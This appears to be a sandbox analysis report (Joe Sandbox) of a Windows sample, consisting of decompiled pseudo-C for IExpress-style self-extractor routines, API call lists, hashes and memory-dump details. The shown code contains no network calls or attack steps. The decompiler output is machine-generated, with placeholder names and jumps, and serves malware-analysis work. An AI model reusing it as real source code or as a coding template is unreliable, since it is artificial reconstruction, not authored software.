                                                          									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                          										L15:
                                                          										GlobalUnlock(_t103);
                                                          										_t99 = _v16;
                                                          										L18:
                                                          										_t87 = _t87 + 1;
                                                          										_t62 = _v8 + 0x3c;
                                                          										_v20 = _t87;
                                                          										_v8 = _v8 + 0x3c;
                                                          										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                          											continue;
                                                          										} else {
                                                          											goto L19;
                                                          										}
                                                          									} else {
                                                          										_t79 = _v44;
                                                          										_t88 = _t106;
                                                          										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                          										_t101 = _v28;
                                                          										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                          										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                          										_t97 = _v48;
                                                          										_v36 = _t83;
                                                          										_t109 = _t83;
                                                          										do {
                                                          											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E01092A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                          											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E01092A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                          											_t109 = _t109 + 0x18;
                                                          											_t88 = _t88 + 4;
                                                          										} while (_t88 < 8);
                                                          										_t87 = _v20;
                                                          										_t106 = 0;
                                                          										if(_v56 < 0 || _v64 > 0) {
                                                          											if(_v52 < _t106 || _v60 > _t106) {
                                                          												GlobalUnlock(_t103);
                                                          											} else {
                                                          												goto L15;
                                                          											}
                                                          										} else {
                                                          											goto L15;
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          						goto L20;
                                                          					}
                                                          				}
                                                          				L20:
                                                          				 *_a8 = _t87;
                                                          				if(_t103 != 0) {
                                                          					GlobalFree(_t103);
                                                          				}
                                                          				return _t106;
                                                          			}

































                                                          0x010928f1
                                                          0x010928f4
                                                          0x010928f7
                                                          0x010928f9
                                                          0x010928fc
                                                          0x010928ff
                                                          0x01092901
                                                          0x01092907
                                                          0x01092a62
                                                          0x01092a64
                                                          0x0109290d
                                                          0x0109290d
                                                          0x0109290f
                                                          0x01092912
                                                          0x01092920
                                                          0x01092937
                                                          0x00000000
                                                          0x00000000
                                                          0x01092944
                                                          0x0109294a
                                                          0x0109294f
                                                          0x01092a2f
                                                          0x01092a32
                                                          0x01092a34
                                                          0x01092a37
                                                          0x01092a41
                                                          0x00000000
                                                          0x00000000
                                                          0x01092955
                                                          0x0109295e
                                                          0x01092962
                                                          0x01092969
                                                          0x0109296f
                                                          0x01092974
                                                          0x0109298c
                                                          0x01092a20
                                                          0x01092a21
                                                          0x01092a27
                                                          0x01092a4c
                                                          0x01092a4f
                                                          0x01092a50
                                                          0x01092a53
                                                          0x01092a56
                                                          0x01092a5c
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010929b2
                                                          0x010929b2
                                                          0x010929b5
                                                          0x010929bd
                                                          0x010929c3
                                                          0x010929cc
                                                          0x010929d5
                                                          0x010929d7
                                                          0x010929da
                                                          0x010929dd
                                                          0x010929df
                                                          0x010929ec
                                                          0x010929f8
                                                          0x010929fc
                                                          0x010929ff
                                                          0x01092a02
                                                          0x01092a07
                                                          0x01092a0a
                                                          0x01092a0f
                                                          0x01092a19
                                                          0x01092a81
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01092a0f
                                                          0x0109298c
                                                          0x01092974
                                                          0x01092962
                                                          0x00000000
                                                          0x0109294f
                                                          0x01092912
                                                          0x01092a65
                                                          0x01092a68
                                                          0x01092a6c
                                                          0x01092a6f
                                                          0x01092a6f
                                                          0x01092a7d

                                                          APIs
                                                          • GlobalFree.KERNEL32 ref: 01092A6F
                                                            • Part of subcall function 01092773: CharUpperA.USER32(08A9C601,00000000,00000000,00000000), ref: 010927A8
                                                            • Part of subcall function 01092773: CharNextA.USER32(0000054D), ref: 010927B5
                                                            • Part of subcall function 01092773: CharNextA.USER32(00000000), ref: 010927BC
                                                            • Part of subcall function 01092773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 01092829
                                                            • Part of subcall function 01092773: RegQueryValueExA.ADVAPI32(?,01091140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 01092852
                                                            • Part of subcall function 01092773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 01092870
                                                            • Part of subcall function 01092773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010928A0
                                                          • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,01093938,?,?,?,?,-00000005), ref: 01092958
                                                          • GlobalLock.KERNEL32 ref: 01092969
                                                          • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,01093938,?,?,?,?,-00000005,?), ref: 01092A21
                                                          • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 01092A81
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                          • String ID:
                                                          • API String ID: 3949799724-0
                                                          • Opcode ID: d0d4c63b149a0b39e050482643c47bb36a22b90d4cdad6eaed81504bb7595d50
                                                          • Instruction ID: ae66c218f94a43ef4e042bec08ad05320b38bef281496d4fe2e387080b24380e
                                                          • Opcode Fuzzy Hash: d0d4c63b149a0b39e050482643c47bb36a22b90d4cdad6eaed81504bb7595d50
                                                          • Instruction Fuzzy Hash: A0513B32E00219EFDF21DF98C894AAEFBB5FF48700F14416AE995E3211D7399941EB94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 32%
                                                          			E01094169(void* __eflags) {
                                                          				int _t18;
                                                          				void* _t21;
                                                          
                                                          				_t20 = E0109468F("FINISHMSG", 0, 0);
                                                          				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                          				if(_t21 != 0) {
                                                          					if(E0109468F("FINISHMSG", _t21, _t20) != 0) {
                                                          						if(lstrcmpA(_t21, "<None>") == 0) {
                                                          							L7:
                                                          							return LocalFree(_t21);
                                                          						}
                                                          						_push(0);
                                                          						_push(0x40);
                                                          						_push(0);
                                                          						_push(_t21);
                                                          						_t18 = 0x3e9;
                                                          						L6:
                                                          						E010944B9(0, _t18);
                                                          						goto L7;
                                                          					}
                                                          					_push(0);
                                                          					_push(0x10);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_t18 = 0x4b1;
                                                          					goto L6;
                                                          				}
                                                          				return E010944B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                          			}





                                                          0x0109417d
                                                          0x0109418f
                                                          0x01094193
                                                          0x010941b7
                                                          0x010941d3
                                                          0x010941e6
                                                          0x00000000
                                                          0x010941e7
                                                          0x010941d5
                                                          0x010941d6
                                                          0x010941d8
                                                          0x010941d9
                                                          0x010941da
                                                          0x010941df
                                                          0x010941e1
                                                          0x00000000
                                                          0x010941e1
                                                          0x010941b9
                                                          0x010941ba
                                                          0x010941bc
                                                          0x010941bd
                                                          0x010941be
                                                          0x00000000
                                                          0x010941be
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 0109468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010946A0
                                                            • Part of subcall function 0109468F: SizeofResource.KERNEL32(00000000,00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946A9
                                                            • Part of subcall function 0109468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010946C3
                                                            • Part of subcall function 0109468F: LoadResource.KERNEL32(00000000,00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946CC
                                                            • Part of subcall function 0109468F: LockResource.KERNEL32(00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946D3
                                                            • Part of subcall function 0109468F: memcpy_s.MSVCRT ref: 010946E5
                                                            • Part of subcall function 0109468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010946EF
                                                          • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,010930B4), ref: 01094189
                                                          • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,010930B4), ref: 010941E7
                                                            • Part of subcall function 010944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01094518
                                                            • Part of subcall function 010944B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 01094554
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                          • String ID: <None>$FINISHMSG
                                                          • API String ID: 3507850446-3091758298
                                                          • Opcode ID: b2118df622176e7bb2734d2f58594d96cabb9043876947deece0b68ca8249b9e
                                                          • Instruction ID: 64b6b7643a5c420466d9e916c6691853ae3ca4f8b7c4326551c36a7542594f05
                                                          • Opcode Fuzzy Hash: b2118df622176e7bb2734d2f58594d96cabb9043876947deece0b68ca8249b9e
                                                          • Instruction Fuzzy Hash: AC0121F1300215BBFF2426698EB4FBB218EEBD8695F008025B7C1E2280DE68CC0221B4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E01097155() {
                                                          				void* _v8;
                                                          				struct _FILETIME _v16;
                                                          				signed int _v20;
                                                          				union _LARGE_INTEGER _v24;
                                                          				signed int _t23;
                                                          				signed int _t36;
                                                          				signed int _t37;
                                                          				signed int _t39;
                                                          
                                                          				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                          				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                          				_t23 =  *0x1098004; // 0x8a9c601
                                                          				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                          					GetSystemTimeAsFileTime( &_v16);
                                                          					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                          					_v8 = _v8 ^ GetCurrentProcessId();
                                                          					_v8 = _v8 ^ GetCurrentThreadId();
                                                          					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                          					QueryPerformanceCounter( &_v24);
                                                          					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                          					_t39 = _t36;
                                                          					if(_t36 == 0xbb40e64e || ( *0x1098004 & 0xffff0000) == 0) {
                                                          						_t36 = 0xbb40e64f;
                                                          						_t39 = 0xbb40e64f;
                                                          					}
                                                          					 *0x1098004 = _t39;
                                                          				}
                                                          				_t37 =  !_t36;
                                                          				 *0x1098008 = _t37;
                                                          				return _t37;
                                                          			}











                                                          0x0109715d
                                                          0x01097161
                                                          0x01097165
                                                          0x01097178
                                                          0x01097182
                                                          0x0109718e
                                                          0x01097197
                                                          0x010971a0
                                                          0x010971b1
                                                          0x010971b8
                                                          0x010971c4
                                                          0x010971c7
                                                          0x010971cb
                                                          0x010971d5
                                                          0x010971da
                                                          0x010971da
                                                          0x010971dc
                                                          0x010971dc
                                                          0x010971e2
                                                          0x010971e5
                                                          0x010971ee

                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 01097182
                                                          • GetCurrentProcessId.KERNEL32 ref: 01097191
                                                          • GetCurrentThreadId.KERNEL32 ref: 0109719A
                                                          • GetTickCount.KERNEL32 ref: 010971A3
                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 010971B8
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                          • String ID:
                                                          • API String ID: 1445889803-0
                                                          • Opcode ID: fb819c99be24f189c95223be8be839a8a9651e1fdb743c4f7016273605e2f422
                                                          • Instruction ID: 6f895dfef22aa0e1bfbd384ab8b1b3942168c944b06033ef5541a8fec32e3104
                                                          • Opcode Fuzzy Hash: fb819c99be24f189c95223be8be839a8a9651e1fdb743c4f7016273605e2f422
                                                          • Instruction Fuzzy Hash: B1113AB1E11208DBCF60DFB8D668A9EBBF5FF48314F614896E841E7204E6399A00DF40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 93%
                                                          			E010919E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                          				signed int _v8;
                                                          				char _v520;
                                                          				void* __esi;
                                                          				signed int _t11;
                                                          				void* _t14;
                                                          				void* _t23;
                                                          				void* _t27;
                                                          				void* _t33;
                                                          				struct HWND__* _t34;
                                                          				signed int _t35;
                                                          
                                                          				_t33 = __edi;
                                                          				_t27 = __ebx;
                                                          				_t11 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t11 ^ _t35;
                                                          				_t34 = _a4;
                                                          				_t14 = _a8 - 0x110;
                                                          				if(_t14 == 0) {
                                                          					_t32 = GetDesktopWindow();
                                                          					E010943D0(_t34, _t15);
                                                          					_v520 = 0;
                                                          					LoadStringA( *0x1099a3c, _a16,  &_v520, 0x200);
                                                          					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                          					MessageBeep(0xffffffff);
                                                          					goto L6;
                                                          				} else {
                                                          					if(_t14 != 1) {
                                                          						L4:
                                                          						_t23 = 0;
                                                          					} else {
                                                          						_t32 = _a12;
                                                          						if(_t32 - 0x83d > 1) {
                                                          							goto L4;
                                                          						} else {
                                                          							EndDialog(_t34, _t32);
                                                          							L6:
                                                          							_t23 = 1;
                                                          						}
                                                          					}
                                                          				}
                                                          				return E01096CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                          			}













                                                          0x010919e0
                                                          0x010919e0
                                                          0x010919eb
                                                          0x010919f2
                                                          0x010919f9
                                                          0x010919fc
                                                          0x01091a01
                                                          0x01091a2a
                                                          0x01091a2e
                                                          0x01091a3e
                                                          0x01091a4f
                                                          0x01091a62
                                                          0x01091a6a
                                                          0x00000000
                                                          0x01091a03
                                                          0x01091a06
                                                          0x01091a20
                                                          0x01091a20
                                                          0x01091a08
                                                          0x01091a08
                                                          0x01091a14
                                                          0x00000000
                                                          0x01091a16
                                                          0x01091a18
                                                          0x01091a70
                                                          0x01091a72
                                                          0x01091a72
                                                          0x01091a14
                                                          0x01091a06
                                                          0x01091a81

                                                          APIs
                                                          • EndDialog.USER32(?,?), ref: 01091A18
                                                          • GetDesktopWindow.USER32 ref: 01091A24
                                                          • LoadStringA.USER32(?,?,00000200), ref: 01091A4F
                                                          • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 01091A62
                                                          • MessageBeep.USER32(000000FF), ref: 01091A6A
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                          • String ID:
                                                          • API String ID: 1273765764-0
                                                          • Opcode ID: 7b3ca437dbc5d029e836bc905fa66ab9e8dabe08cd8e9b28ae065d31e8698e91
                                                          • Instruction ID: 7ca9b3428ea5930eb7b95d4259c039ca03282a00c378498dea2ebb6de031594d
                                                          • Opcode Fuzzy Hash: 7b3ca437dbc5d029e836bc905fa66ab9e8dabe08cd8e9b28ae065d31e8698e91
                                                          • Instruction Fuzzy Hash: A511827170010AABDF20DF68D928AAE77F8FB49250F108155E9A293184DA399E01DB95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 88%
                                                          			E010963C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				long _v272;
                                                          				void* _v276;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t15;
                                                          				long _t28;
                                                          				struct _OVERLAPPED* _t37;
                                                          				void* _t39;
                                                          				signed int _t40;
                                                          
                                                          				_t15 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t15 ^ _t40;
                                                          				_v272 = _v272 & 0x00000000;
                                                          				_push(__ecx);
                                                          				_v276 = _a16;
                                                          				_t37 = 1;
                                                          				E01091781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
                                                          				E0109658A( &_v268, 0x104, _a12);
                                                          				_t28 = 0;
                                                          				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                          				if(_t39 != 0xffffffff) {
                                                          					_t28 = _a4;
                                                          					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                          						 *0x1099124 = 0x80070052;
                                                          						_t37 = 0;
                                                          					}
                                                          					CloseHandle(_t39);
                                                          				} else {
                                                          					 *0x1099124 = 0x80070052;
                                                          					_t37 = 0;
                                                          				}
                                                          				return E01096CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                          			}















                                                          0x010963cb
                                                          0x010963d2
                                                          0x010963d8
                                                          0x010963ea
                                                          0x010963f3
                                                          0x01096401
                                                          0x01096402
                                                          0x01096410
                                                          0x01096415
                                                          0x01096433
                                                          0x01096438
                                                          0x01096449
                                                          0x01096463
                                                          0x0109646d
                                                          0x01096477
                                                          0x01096477
                                                          0x0109647a
                                                          0x0109643a
                                                          0x0109643a
                                                          0x01096444
                                                          0x01096444
                                                          0x01096492

                                                          APIs
                                                          • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0109642D
                                                          • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0109645B
                                                          • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0109647A
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 010963EB
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleWrite
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                          • API String ID: 1065093856-2356899610
                                                          • Opcode ID: 06874f86ff77979dde7773ed48bca147aa5eb212db4294e83486cbe4182b1ace
                                                          • Instruction ID: 9ad6e0eec24bea500fdbf57f44e9689939fa5ee6b56b9bba19bfdf10c351dcad
                                                          • Opcode Fuzzy Hash: 06874f86ff77979dde7773ed48bca147aa5eb212db4294e83486cbe4182b1ace
                                                          • Instruction Fuzzy Hash: 9121D5B1A0021CABDB20DF65DC95FEB77B8FB89314F0041A9F5D5A3240DAB65D848F64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E010947E0(intOrPtr* __ecx) {
                                                          				intOrPtr _t6;
                                                          				intOrPtr _t9;
                                                          				void* _t11;
                                                          				void* _t19;
                                                          				intOrPtr* _t22;
                                                          				void _t24;
                                                          				struct HWND__* _t25;
                                                          				struct HWND__* _t26;
                                                          				void* _t27;
                                                          				intOrPtr* _t28;
                                                          				intOrPtr* _t33;
                                                          				void* _t34;
                                                          
                                                          				_t33 = __ecx;
                                                          				_t34 = LocalAlloc(0x40, 8);
                                                          				if(_t34 != 0) {
                                                          					_t22 = _t33;
                                                          					_t27 = _t22 + 1;
                                                          					do {
                                                          						_t6 =  *_t22;
                                                          						_t22 = _t22 + 1;
                                                          					} while (_t6 != 0);
                                                          					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                          					 *_t34 = _t24;
                                                          					if(_t24 != 0) {
                                                          						_t28 = _t33;
                                                          						_t19 = _t28 + 1;
                                                          						do {
                                                          							_t9 =  *_t28;
                                                          							_t28 = _t28 + 1;
                                                          						} while (_t9 != 0);
                                                          						E01091680(_t24, _t28 - _t19 + 1, _t33);
                                                          						_t11 =  *0x10991e0; // 0xd18308
                                                          						 *(_t34 + 4) = _t11;
                                                          						 *0x10991e0 = _t34;
                                                          						return 1;
                                                          					}
                                                          					_t25 =  *0x1098584; // 0x0
                                                          					E010944B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                          					LocalFree(_t34);
                                                          					L2:
                                                          					return 0;
                                                          				}
                                                          				_t26 =  *0x1098584; // 0x0
                                                          				E010944B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                          				goto L2;
                                                          			}















                                                          0x010947e8
                                                          0x010947f0
                                                          0x010947f4
                                                          0x0109480f
                                                          0x01094811
                                                          0x01094814
                                                          0x01094814
                                                          0x01094816
                                                          0x01094817
                                                          0x01094829
                                                          0x0109482b
                                                          0x0109482f
                                                          0x0109484f
                                                          0x01094852
                                                          0x01094855
                                                          0x01094855
                                                          0x01094857
                                                          0x01094858
                                                          0x01094860
                                                          0x01094865
                                                          0x0109486a
                                                          0x0109486f
                                                          0x00000000
                                                          0x01094876
                                                          0x01094831
                                                          0x01094841
                                                          0x01094847
                                                          0x0109480b
                                                          0x00000000
                                                          0x0109480b
                                                          0x010947f6
                                                          0x01094806
                                                          0x00000000

                                                          APIs
                                                          • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,01094E6F), ref: 010947EA
                                                          • LocalAlloc.KERNEL32(00000040,?), ref: 01094823
                                                          • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 01094847
                                                            • Part of subcall function 010944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01094518
                                                            • Part of subcall function 010944B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 01094554
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 01094851
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Local$Alloc$FreeLoadMessageString
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                          • API String ID: 359063898-2356899610
                                                          • Opcode ID: d17749bbd7db96ed1dd3fb7e4b4ecc71443ff7e67e7072ca1874a6db9f0c03ef
                                                          • Instruction ID: f5f00e05f6176c833691178ec6b951f69ed076207d2e1eb14bd9a1e5f8632a63
                                                          • Opcode Fuzzy Hash: d17749bbd7db96ed1dd3fb7e4b4ecc71443ff7e67e7072ca1874a6db9f0c03ef
                                                          • Instruction Fuzzy Hash: 8C1106B5604641AFDF658E249938FBB3B9AFBC6340B048559F9C2CB345DA3A8807D760
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 77%
                                                          			E01096517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                          				struct HRSRC__* _t6;
                                                          				void* _t21;
                                                          				struct HINSTANCE__* _t23;
                                                          				int _t24;
                                                          
                                                          				_t23 =  *0x1099a3c; // 0x1090000
                                                          				_t6 = FindResourceA(_t23, __edx, 5);
                                                          				if(_t6 == 0) {
                                                          					L6:
                                                          					E010944B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                          					_t24 = _a16;
                                                          				} else {
                                                          					_t21 = LoadResource(_t23, _t6);
                                                          					if(_t21 == 0) {
                                                          						goto L6;
                                                          					} else {
                                                          						if(_a12 != 0) {
                                                          							_push(_a12);
                                                          						} else {
                                                          							_push(0);
                                                          						}
                                                          						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                          						FreeResource(_t21);
                                                          						if(_t24 == 0xffffffff) {
                                                          							goto L6;
                                                          						}
                                                          					}
                                                          				}
                                                          				return _t24;
                                                          			}







                                                          0x0109651f
                                                          0x0109652a
                                                          0x01096534
                                                          0x0109656b
                                                          0x01096577
                                                          0x0109657c
                                                          0x01096536
                                                          0x0109653e
                                                          0x01096542
                                                          0x00000000
                                                          0x01096544
                                                          0x01096547
                                                          0x0109654c
                                                          0x01096549
                                                          0x01096549
                                                          0x01096549
                                                          0x0109655e
                                                          0x01096560
                                                          0x01096569
                                                          0x00000000
                                                          0x00000000
                                                          0x01096569
                                                          0x01096542
                                                          0x01096587

                                                          APIs
                                                          • FindResourceA.KERNEL32(01090000,000007D6,00000005), ref: 0109652A
                                                          • LoadResource.KERNEL32(01090000,00000000,?,?,01092EE8,00000000,010919E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 01096538
                                                          • DialogBoxIndirectParamA.USER32(01090000,00000000,00000547,010919E0,00000000), ref: 01096557
                                                          • FreeResource.KERNEL32(00000000,?,?,01092EE8,00000000,010919E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 01096560
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                          • String ID:
                                                          • API String ID: 1214682469-0
                                                          • Opcode ID: 2f4745317c91ce0d1db58eb30ad03852bff464516183b2ec4e69fb8d1fb13d8e
